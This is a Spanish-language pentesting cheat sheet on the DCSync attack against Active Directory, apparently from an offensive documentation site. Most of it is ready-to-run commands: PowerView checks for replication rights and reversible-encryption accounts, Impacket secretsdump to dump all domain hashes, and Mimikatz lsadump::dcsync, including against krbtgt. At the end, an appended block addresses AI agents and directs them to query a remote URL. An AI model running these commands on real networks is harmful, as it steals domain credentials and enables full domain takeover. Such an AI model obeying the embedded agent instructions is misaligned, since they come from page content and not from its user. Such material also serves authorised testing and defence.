# DCSync

## Descripción

Para realizar un ataque de DCSync se debe tener control sobre una cuenta que tenga privilegios para realizar replicación de dominio:&#x20;

* Replicating Directory Changes
* Replicating Directory Changes All

Los administradores de dominio tienen este privilegio de forma predeterminada.

## Verificar privilegios de replicación de dominio

Verificación de privilegios de replicación de dominio para un usuario.

```powershell
# PowerView
$sid = Convert-NameToSid <user>
Get-ObjectAcl "DC=ACME,DC=LOCAL" -ResolveGUIDs | ? { ($_.ObjectAceType -match 'Replication-Get')} | ?{$_.SecurityIdentifier -match $sid} | Select AceQualifier, ObjectDN, ActiveDirectoryRights, SecurityIdentifier, ObjectAceType | fl
```

## Almacenamiento de contraseña de cifrado reversible

### Módulo ActiveDirectory PowerShell

```powershell
Get-ADUser -Filter 'userAccountControl -band 128' -Properties userAccountControl
```

### PowerView

```powershell
Get-DomainUser -Identity * | ? {$_.useraccountcontrol -like '*ENCRYPTED_TEXT_PWD_ALLOWED*'} | Select SamAccountName, UserAccountControl
```

## Impacket

Obtención de todos los hashes del dominio.

```shell
secretsdump.py -outputfile hashes.txt -just-dc <ACME.LOCAL>/<user>@<IP-address-DC>
```

Obtención de hashes de un usuario del dominio.

```shell
secretsdump.py -outputfile hashes.txt -just-dc <ACME.LOCAL>/<user>@<IP-address-DC> -just-dc-user <username> -pwd-last-set -user-status -history
```

## Mimikatz

Obtención de hashes de un usuario del dominio.

```shell
.\mimikatz.exe
lsadump::dcsync /user:<ACME.LOCAL>\<user>
# Usuario KRBTGT
lsadump::dcsync /user:<ACME.LOCAL>\krbtgt
```

## Invoke-Mimikatz

Obtención de hashes de un usuario del dominio.

```powershell
# Usuario
Invoke-Mimikatz -Command '"lsadump::dcsync /user:<ACME.LOCAL>\<user>"'
# Usuario KRBTGT
Invoke-Mimikatz -Command '"lsadump::dcsync /user:<ACME.LOCAL>\krbtgt"'
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://activedirectory.mrw0l05zyn.cl/escalamiento-de-privilegios-de-dominio/dcsync.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.